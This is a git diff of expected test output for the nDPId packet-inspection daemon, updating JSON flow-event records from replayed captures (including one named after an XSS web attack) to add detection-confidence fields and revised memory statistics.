-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348078531,"flow_last_seen":1499348083921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35736,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348078531,"flow_last_seen":1499348083921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35736,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348078531,"flow_last_seen":1499348083921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35736,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348081113,"flow_last_seen":1499348086921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35762,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348081113,"flow_last_seen":1499348086921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35762,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348081113,"flow_last_seen":1499348086921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35762,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348082422,"flow_last_seen":1499348087922,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35776,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348082422,"flow_last_seen":1499348087922,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35776,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348082422,"flow_last_seen":1499348087922,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348083715,"flow_last_seen":1499348088922,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35790,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348083715,"flow_last_seen":1499348088922,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35790,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348083715,"flow_last_seen":1499348088922,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35790,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348086300,"flow_last_seen":1499348091923,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35816,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348086300,"flow_last_seen":1499348091923,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35816,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348086300,"flow_last_seen":1499348091923,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348087568,"flow_last_seen":1499348092924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35830,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348087568,"flow_last_seen":1499348092924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35830,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348087568,"flow_last_seen":1499348092924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35830,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348090129,"flow_last_seen":1499348095924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35856,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348090129,"flow_last_seen":1499348095924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35856,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348090129,"flow_last_seen":1499348095924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35856,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348091413,"flow_last_seen":1499348096924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35870,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348091413,"flow_last_seen":1499348096924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35870,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348091413,"flow_last_seen":1499348096924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35870,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348092675,"flow_last_seen":1499348097925,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35884,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348092675,"flow_last_seen":1499348097925,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35884,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348092675,"flow_last_seen":1499348097925,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348095258,"flow_last_seen":1499348095259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35910,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348095258,"flow_last_seen":1499348095259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35910,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348095258,"flow_last_seen":1499348095259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35910,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348096595,"flow_last_seen":1499348096595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35924,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348096595,"flow_last_seen":1499348096595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35924,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348096595,"flow_last_seen":1499348096595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35924,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348099359,"flow_last_seen":1499348099360,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35950,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348099359,"flow_last_seen":1499348099360,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35950,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348099359,"flow_last_seen":1499348099360,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35950,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499347939286,"flow_last_seen":1499348006339,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232672,"flow_avg_l4_payload_len":748,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499347939286,"flow_last_seen":1499348006339,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232672,"flow_avg_l4_payload_len":748,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
 00165{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","total-events-serialized":3968}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 9374/9374
@@ -3974,10 +3974,10 @@
 ~~ total active/idle flows...: 661/661
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 6296271 bytes
-~~ total memory freed........: 6296271 bytes
-~~ total allocations/frees...: 112213/112213
+~~ total memory allocated....: 5960120 bytes
+~~ total memory freed........: 5960120 bytes
+~~ total allocations/frees...: 113803/113803
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 170 chars
-~~ json string max len.......: 1010 chars
-~~ json string avg len.......: 659 chars
+~~ json string max len.......: 1116 chars
+~~ json string avg len.......: 712 chars
diff --git a/test/results/aimini-http.pcap.out b/test/results/aimini-http.pcap.out
index de9f02212..7469ea194 100644
--- a/test/results/aimini-http.pcap.out
+++ b/test/results/aimini-http.pcap.out
@@ -3,26 +3,26 @@
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614860229383,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1614860229383,"pkt":"5kBKB+riApXG95NLCABFAAAwBPkAAIAGAAAKZQACCmYAAm9VAFCbu4XRAAAAAHACgAEU8QAAAgQFtAMDAQA="}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614860229383,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1614860229383,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBPkAAH8GIgEKZQACCmYAAm9VAFCbu4XRAAAAAHACgAFeHQAAAgQFtAMDAQA="}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614860229384,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1614860229384,"pkt":"WgXZu6TVApXG95WRCABFAAAwBQQAAIAGAAAKZgACCmUAAgBQb1Wbu5n7m7uF0nASgAEU8QAAAgQFtAMDAQA="}
-00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229383,"flow_last_seen":1614860229384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":595,"flow_tot_l4_payload_len":595,"flow_avg_l4_payload_len":99,"midstream":0,"ts_msec":1614860229384,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28501,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}}
+00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229383,"flow_last_seen":1614860229384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":595,"flow_tot_l4_payload_len":595,"flow_avg_l4_payload_len":99,"midstream":0,"ts_msec":1614860229384,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28501,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}}
